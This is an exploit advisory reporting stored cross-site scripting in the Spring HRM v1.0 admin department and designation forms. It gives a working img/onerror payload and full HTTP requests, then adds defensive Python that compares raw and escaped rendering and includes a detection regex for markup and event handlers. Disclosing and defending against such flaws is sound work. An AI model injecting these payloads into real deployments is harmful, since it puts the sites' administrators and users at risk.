Spring HRM v1.0 / Cross-site Scripting

2022.01.18
Risk: Low
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: Spring HRM - HRM & Payroll / Cross-site Scripting
# Date: 18/01/2022
# Exploit Author: Esra Nur SAYIM
# Vendor Homepage: https://www.springsoftit.com/
# Software Link: https://codecanyon.net/item/spring-hrm-hrm-payroll/35416929
# Version: 1.0
# Tested on: Windows 10 Enterprise 21H2, Ubuntu WSL 20

Vulnerability: https://{{DOMAIN}}/admin/add-department
Payload: "><img src=x onerror=alert('XSS')>

HTTP Request:

POST /admin/add-department HTTP/2
Host: {{HOST}}
Cookie: {{COOKIES}}
Content-Length: 56
Sec-Ch-Ua: "Chromium";v="97", " Not;A Brand";v="99"
X-Csrf-Token: NtspEMEP3AifxPm7nQTY0I7LXK3AFVKXKyzfbJUV
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: {{HOST}}
Referer: {{HOST}}/admin/addDepartment
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

dept_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert('XSS')%3E

--------------------

Vulnerability: https://{{DOMAIN}}/admin/add-designation
Payload: "><img src=x onerror=alert('XSS')>

HTTP Request:

POST /admin/add-designation HTTP/2
Host: {{HOST}}
Cookie: {{COOKIES}}
Content-Length: 63
Sec-Ch-Ua: "Chromium";v="97", " Not;A Brand";v="99"
X-Csrf-Token: NtspEMEP3AifxPm7nQTY0I7LXK3AFVKXKyzfbJUV
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: {{HOST}}
Referer: {{HOST}}/admin/addDepartment
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

designation_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert('XSS')%3E
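Both requests above submit the same value in a form field (dept_name, designation_name) that the application later places into HTML without encoding it, which is why a leading double quote followed by an img tag turns a department name into script execution. The Python below is an added example, not code from Spring HRM or from the advisory author. It decodes the two form bodies exactly as given in the advisory, contrasts a hypothetical unescaped attribute template with an HTML-encoded one, applies an allow-list check a defender could enforce at input time, and flags request bodies carrying tag or event-handler syntax so the pattern can be spotted in WAF or access logs. The template strings, the NAME_RE allow-list and all function names are assumptions.

```python
import html
import re
from urllib.parse import parse_qs

# Form bodies copied verbatim from the advisory's two HTTP requests (path -> body).
ADVISORY_BODIES = {
    "/admin/add-department": "dept_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert('XSS')%3E",
    "/admin/add-designation": "designation_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert('XSS')%3E",
}

# Matches the name of every HTML start tag present in a rendered fragment.
TAG_RE = re.compile(r"<\s*([A-Za-z][A-Za-z0-9]*)")

# Markup that has no business inside a department or designation name:
# a start/end tag, an on*= event handler, or a javascript: URL.
SUSPECT_RE = re.compile(r"<\s*/?\s*[A-Za-z]|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)

# Hypothetical allow-list for a human-readable name (an assumption, not the vendor's rule).
NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 &.,/()-]{0,63}$")


def decode_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {field: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_unescaped(name: str) -> str:
    """Hypothetical vulnerable template: the stored name is concatenated raw into a
    quoted attribute, so a leading double quote closes the attribute and the rest of
    the value becomes live markup (the behaviour the advisory reports)."""
    return f'<input type="text" name="dept_name" value="{name}">'


def render_escaped(name: str) -> str:
    """Hardened template: HTML-encode the value, quotes included, before insertion."""
    return f'<input type="text" name="dept_name" value="{html.escape(name, quote=True)}">'


def active_tags(fragment: str) -> list:
    """Names of the start tags a browser would actually parse out of a fragment."""
    return [m.group(1).lower() for m in TAG_RE.finditer(fragment)]


def is_valid_name(name: str) -> bool:
    """Defence in depth: reject names containing markup characters at input time.
    This supplements output encoding; it does not replace it."""
    return NAME_RE.match(name) is not None


def flag_suspicious_fields(body: str) -> list:
    """Log-triage helper: return the form fields whose decoded value carries
    tag-like or event-handler syntax."""
    return [field for field, value in decode_form(body).items() if SUSPECT_RE.search(value)]


if __name__ == "__main__":
    for path, body in ADVISORY_BODIES.items():
        value = next(iter(decode_form(body).values()))
        print(path, "flagged fields:", flag_suspicious_fields(body))
        print("  raw template renders tags:    ", active_tags(render_unescaped(value)))
        print("  escaped template renders tags:", active_tags(render_escaped(value)))
        print("  passes name allow-list:       ", is_valid_name(value))
```

Run as a script it walks both advisory bodies: the raw template yields an extra img tag (the injected element), the escaped template yields only the wrapper input, and both fields are flagged. Context-aware output encoding is the actual fix for this class of bug; the allow-list and the log check are secondary controls that make the same submission fail early and leave a trace.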


Copyright 2024, cxsecurity.com